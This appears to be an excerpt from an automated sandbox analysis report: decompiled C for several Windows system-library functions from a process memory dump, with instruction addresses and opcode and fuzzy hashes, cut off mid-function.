0x015d917f
0x015d9182
0x015d9182
0x015d9187
0x015d9187
0x015d918a
0x015d918d
0x015d918f
0x015d9192
0x015d9195
0x015d9198
0x015d9198
0x015d9198
0x015d919a
0x00000000
0x00000000
0x0163371f
0x01633721
0x01633727
0x0163372f
0x01633733
0x01633735
0x01633738
0x0163373b
0x0163373d
0x01633740
0x00000000
0x00000000
0x01633746
0x01633749
0x00000000
0x00000000
0x0163374f
0x01633751
0x00000000
0x00000000
0x01633757
0x01633759
0x0163375c
0x0163375c
0x0163375e
0x0163375e
0x01633761
0x01633764
0x00000000
0x00000000
0x01633766
0x01633768
0x016337a3
0x016337a3
0x016337a5
0x016337a7
0x016337ad
0x016337b0
0x016337b2
0x016337bc
0x016337c2
0x016337c2
0x016337b2
0x015d9187
0x015d9187
0x015d918a
0x015d918d
0x015d918f
0x015d9192
0x015d9195
0x00000000
0x015d9195
0x00000000
0x015d9187
0x0163376a
0x0163376a
0x0163376c
0x0163376c
0x0163376f
0x01633775
0x00000000
0x00000000
0x01633777
0x01633779
0x00000000
0x00000000
0x01633782
0x01633787
0x01633789
0x01633790
0x01633790
0x0163378b
0x0163378b
0x0163378b
0x01633792
0x01633795
0x01633795
0x01633798
0x01633798
0x0163379b
0x0163379b
0x015d91a3
0x015d91a9
0x015d91b0
0x015d91b4
0x015d91b4
0x015d91bb
0x015d91c0
0x015d91c5
0x015d91c7
0x016337da
0x015d91cd
0x015d91cd
0x015d91cd
0x015d91d2
0x015d91d5
0x015d9239
0x015d9239
0x015d91d7
0x015d91db
0x015d91e1
0x015d91e7
0x015d91fd
0x015d9203
0x015d921e
0x015d9223
0x00000000
0x015d9223
0x015d9205
0x015d9208
0x015d920c
0x015d9214
0x015d9214
0x015d91e9
0x015d91e9
0x015d91ee
0x015d91f3
0x015d91f3
0x015d91f3
0x015d91e7
0x00000000
0x015d91db
0x015d9187
0x015d9168

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb1cdec1ac7a06b81e8ba6c188caa3a83397626cad4648e4749434f5e9f80b74
Instruction ID: 366b054d8d5087813496ad5ddb7af378077c960d524f025b4fe78f957afb89b4
Opcode Fuzzy Hash: cb1cdec1ac7a06b81e8ba6c188caa3a83397626cad4648e4749434f5e9f80b74
Instruction Fuzzy Hash: 52319C75A01656DFDB36DFACC888BADBBB1BB88318F18814DC5046B342C330A980CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0160F527, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0160F527(void* __ecx, void* __edx, signed int* _a4) {
				char _v8;
				signed int _v12;
				void* __ebx;
				signed int _t28;
				signed int _t32;
				signed int _t34;
				signed char* _t37;
				intOrPtr _t38;
				intOrPtr* _t50;
				signed int _t53;
				void* _t69;

				_push(__ecx);
				_push(__ecx);
				_t69 = __ecx;
				_t53 =  *(__ecx + 0x10);
				_t50 = __ecx + 0x14;
				_t28 = _t53 + __edx;
				_v12 = _t28;
				if(_t28 >  *_t50) {
					_v8 = _t28 -  *_t50;
					_push(E01600678( *((intOrPtr*)(__ecx + 0xc)), 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push(_t50);
					_push(0xffffffff);
					_t32 = E01619660();
					__eflags = _t32;
					if(_t32 < 0) {
						 *_a4 =  *_a4 & 0x00000000;
						L2:
						return _t32;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t69 + 0xc)) + 0x1e8)) =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0xc)) + 0x1e8)) + _v8;
					_t34 = E015F7D50();
					_t66 = 0x7ffe0380;
					__eflags = _t34;
					if(_t34 != 0) {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					} else {
						_t37 = 0x7ffe0380;
					}
					__eflags =  *_t37;
					if( *_t37 != 0) {
						_t38 =  *[fs:0x30];
						__eflags =  *(_t38 + 0x240) & 0x00000001;
						if(( *(_t38 + 0x240) & 0x00000001) == 0) {
							goto L7;
						}
						__eflags = E015F7D50();
						if(__eflags != 0) {
							_t66 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01691582(_t50,  *((intOrPtr*)(_t69 + 0xc)),  *_t50, __eflags, _v8,  *( *((intOrPtr*)(_t69 + 0xc)) + 0x74) << 3,  *_t66 & 0x000000ff);
						E0169138A(_t50,  *((intOrPtr*)(_t69 + 0xc)),  *_t50, _v8, 9);
						goto L7;
					} else {
						L7:
						 *_t50 =  *_t50 + _v8;
						_t53 =  *(_t69 + 0x10);
						goto L1;
					}
				}
				L1:
				 *_a4 = _t53;
				 *(_t69 + 0x10) = _v12;
				_t32 = 0;
				goto L2;
			}

0x0160f52c
0x0160f52d
0x0160f530
0x0160f533
0x0160f536
0x0160f539
0x0160f53c
0x0160f541
0x0160f561
0x0160f569
0x0160f56a
0x0160f572
0x0160f573
0x0160f575
0x0160f576
0x0160f578
0x0160f57d
0x0160f57f
0x0160f5b7
0x0160f550
0x0160f556
0x0160f556
0x0160f587
0x0160f58d
0x0160f592
0x0160f597
0x0160f599
0x0164bcc9
0x0160f59f
0x0160f59f
0x0160f59f
0x0160f5a1
0x0160f5a4
0x0164bcd3
0x0164bcd9
0x0164bce0
0x00000000
0x00000000
0x0164bceb
0x0164bced
0x0164bcf8
0x0164bcf8
0x0164bcf8
0x0164bd11
0x0164bd20
0x00000000
0x0160f5aa
0x0160f5aa
0x0160f5ad
0x0160f5af
0x00000000
0x0160f5af
0x0160f5a4
0x0160f543
0x0160f546
0x0160f54b
0x0160f54e
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1964674c32ee0b8d0769a9c26bb8bd53e50b50cf439c01f9c98bc06a8389b4f
Instruction ID: 09951c0c9e6dc9c9ba4f2c9fd01edb50f034b0bc4f16cf0864581dde6d0bd558
Opcode Fuzzy Hash: a1964674c32ee0b8d0769a9c26bb8bd53e50b50cf439c01f9c98bc06a8389b4f
Instruction Fuzzy Hash: 9E316831600645EFDB26CF68C884F6AB7F9EF84354F2445A9E915CB290EB71EE01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01601DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E01601DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E015FF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L015F4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E015FF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x01601dc2
0x01601dc5
0x01601dc7
0x01601dcc
0x01601dce
0x01601dd6
0x01601ddf
0x01601de0
0x01601de1
0x01601de5
0x01601de8
0x01601def
0x01601df0
0x01601df6
0x01601df7
0x01601dfe
0x01601e1a
0x00000000
0x00000000
0x01601e0b
0x01601e12
0x01601e12
0x01601e00
0x01601e00
0x01601e05
0x01601e1e
0x01601e23
0x0164570f
0x01645713
0x00000000
0x00000000
0x01645719
0x01645719
0x01601e2c
0x01601e2d
0x01601e2e
0x01601e2f
0x01601e31
0x01601e32
0x01601e35
0x01601e3d
0x01645723
0x0164573d
0x0164573d
0x00000000
0x01645723
0x01601e49
0x01601e4e
0x01601e4e
0x01601e09
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: e995fbfbe3cb37db56da7aadd5275f38422296ebafa57c6fc748ad98e7e3d05c
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: BB217F72600219EBD726CF99CC80EAFBBB9FF86740F114065EA059B250D734EE41C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 015F0050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E015F0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x16cd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E01609ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0161B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E016A8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E01609702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x16cb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x015f0055
0x015f005d
0x015f0062
0x015f006c
0x015f006f
0x015f0074
0x015f007a
0x015f007a
0x015f0080
0x015f0080
0x015f0087
0x015f008d
0x015f008f
0x015f0093
0x015f0095
0x015f009b
0x015f00f8
0x015f00fb
0x015f00fc
0x015f00ff
0x015f0108
0x015f0108
0x015f00a2
0x015f00a6
0x015f00b3
0x015f00bc
0x015f00c5
0x015f00ca
0x0163c01e
0x00000000
0x00000000
0x0163c02d
0x015f00d5
0x015f00d9
0x0163c03d
0x0163c046
0x0163c046
0x015f00df
0x015f00e2
0x015f00ea
0x015f00ef
0x015f00f2
0x015f00f6
0x015f0111
0x015f0117
0x015f0117
0x00000000
0x015f00f6
0x015f00d0
0x015f00d0
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d353035714e08053dbaa6ebb459fde2c8ae224edbdc38aa939fc313ca14df6
Instruction ID: d1d97698a53960b8285a8c8d9dc0aafca19d66741e8e39eec8be8244c785b2b1
Opcode Fuzzy Hash: f1d353035714e08053dbaa6ebb459fde2c8ae224edbdc38aa939fc313ca14df6
Instruction Fuzzy Hash: E1318E31201B04CFD726CB28CC44B5AB7E6FF89714F18496DE59A8BB91DB35AC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01656C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01656C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E015F7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x16c7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L015F4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0161F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E015F7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E01619AE0();
						_t23 = L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x01656c0a
0x01656c0f
0x01656c10
0x01656c13
0x01656c15
0x01656c19
0x01656c1c
0x01656c21
0x01656c28
0x01656c3a
0x01656c2a
0x01656c33
0x01656c33
0x01656c3f
0x01656c48
0x01656c4d
0x01656c60
0x01656c65
0x01656c69
0x01656c73
0x01656c79
0x01656c7f
0x01656c86
0x01656c90
0x01656c94
0x01656ca6
0x01656cb2
0x01656cbd
0x01656cbd
0x01656cc3
0x01656cc7
0x01656ccb
0x01656cd0
0x01656cd1
0x01656ce2
0x01656ce2
0x01656c69
0x01656ced

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4c96daac2bc620d4de592b4da716306e5d3991bef8591f2a2f28d1a8ec21bb0
Instruction ID: cde6052e1f3e8cce53a45f03deb55a00c8cc7f969cbd2665de8a250d4e102470
Opcode Fuzzy Hash: d4c96daac2bc620d4de592b4da716306e5d3991bef8591f2a2f28d1a8ec21bb0
Instruction Fuzzy Hash: C9219A72A00645AFD711DB68DC80E6AB7B8FF48700F140069FA08CB791D734ED10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 016190AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E016190AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0162D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0160E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L015F4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0161F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0160A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x016190af
0x016190b8
0x016190bb
0x016190bf
0x016190c2
0x016190c2
0x016190c8
0x016190cb
0x016190cd
0x016514d7
0x016514eb
0x016514eb
0x00000000
0x016514eb
0x016514db
0x016514e6
0x00000000
0x016514f2
0x016514e8
0x00000000
0x016514e8
0x016190d8
0x016190da
0x016190dd
0x016190e5
0x00000000
0x01619139
0x016190fa
0x016190fe
0x01619142
0x00000000
0x01619142
0x01619104
0x01619107
0x0161910b
0x01619110
0x01619118
0x01619147
0x01619148
0x0161914f
0x01619150
0x01619151
0x01619152
0x01619156
0x0161915d
0x01619160
0x01619168
0x0161916c
0x016191bc
0x016191be
0x00000000
0x016191be
0x0161916e
0x01619173
0x01619176
0x00000000
0x00000000
0x0161917c
0x01619180
0x016191b5
0x00000000
0x016191b5
0x01619182
0x01619185
0x01619189
0x00000000
0x00000000
0x0161918e
0x01619190
0x01619198
0x00000000
0x00000000
0x016191a0
0x00000000
0x016191ad
0x016191ad
0x016191b0
0x016191b1
0x00000000
0x01619185
0x0161911a
0x0161911c
0x0161911f
0x01619125
0x01619127
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 2b10edd99d917e69f2638d6762a7bc4ee9b1cbdc1b875a92dbe882d3de5f4bd1
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 3F218071A00205EFDB21DF59CC45AAAFBF8EB54314F18886EE949A7340D330EE44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01603B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E01603B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x16c84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x16c84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L015F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x16c84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0161AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0161FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x16c84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x16c84c4; // 0x0
					L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x01603b89
0x01603b96
0x01603ba1
0x01603bab
0x01603bb5
0x01603bb9
0x01646298
0x01603bbf
0x01603bc2
0x01603bc3
0x01603bc9
0x01603bca
0x01603bcc
0x01603bcd
0x01603bd4
0x01603bd6
0x01603bdb
0x01603bea
0x01603bf7
0x01603bfb
0x01603bff
0x01603c09
0x01603c0a
0x01603c0b
0x01603c0f
0x01603c14
0x01603c18
0x01603c18
0x01603bfb
0x01603c1b
0x01603c30
0x01603c30
0x01603c3d

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06deb8e451893b77299e64894382b8b8bc0dd466afe4e4d18a11877cb04afc65
Instruction ID: 850a4bc08fb0d373aeb729f1b3d31767e145fe8605facfff92626f99deabd443
Opcode Fuzzy Hash: 06deb8e451893b77299e64894382b8b8bc0dd466afe4e4d18a11877cb04afc65
Instruction Fuzzy Hash: 8321BE72A00109AFC715DF98CD81B6ABBBDFB44308F1540A8EA08AB252C371AD158B90

Uniqueness

Uniqueness Score: -1.00%

Function 01656CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01656CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E015F7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E015F7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x15b5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0160F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0160F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01657016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L015F2400( &_v52);
								}
								_t21 = L015F2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x01656cfb
0x01656d00
0x01656d02
0x01656d06
0x01656d0a
0x01656d0e
0x01656d19
0x01656d2b
0x01656d1b
0x01656d24
0x01656d24
0x01656d33
0x01656d39
0x01656d46
0x01656d4f
0x01656d61
0x01656d51
0x01656d5a
0x01656d5a
0x01656d69
0x01656d6b
0x01656d6d
0x01656d6f
0x01656d6f
0x01656d74
0x01656d79
0x01656d7a
0x01656d7f
0x01656d82
0x01656d88
0x01656d89
0x01656d90
0x01656d94
0x01656da7
0x01656db1
0x01656db1
0x01656dbb
0x01656dbb
0x01656d90
0x01656d69
0x01656d46
0x01656dc6

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff0f1e68d7d790b7ac0984d8bb13530156c617d64764361814e8df35ee09e2f
Instruction ID: 0df52832514c47030608a3ad32ac4895ccac0222d5bb31ae0e0296a867dea45c
Opcode Fuzzy Hash: dff0f1e68d7d790b7ac0984d8bb13530156c617d64764361814e8df35ee09e2f
Instruction Fuzzy Hash: B221C5735042469BD711DF29CD44B67BBECAF91640F440A5AFE40CB291E734D549C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 016A070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E016A070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E016A07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0169AFDE( &_v8,  &_v12);
					E016A1293(_t38, _v28, _t60);
					if(E015F7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E016914FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x016a071b
0x016a0724
0x016a0734
0x016a0738
0x016a074b
0x016a074b
0x016a0753
0x016a0753
0x016a0759
0x016a075d
0x016a0774
0x016a0779
0x016a077d
0x016a0789
0x016a0795
0x016a07a7
0x016a0797
0x016a07a0
0x016a07a0
0x016a07af
0x016a07c4
0x016a07cd
0x016a07cd
0x016a07af
0x016a07dc

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 097fb6c6934b24569ce9a8491b535b8344bf701a4473dc57e540f47e8ee032f2
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: E921DE36204201AFD715DF28CC80A6ABBEAEBD4650F04866DF9958B381DB30DD09CF95

Uniqueness

Uniqueness Score: -1.00%

Function 01657794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E01657794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x16c7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L015F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
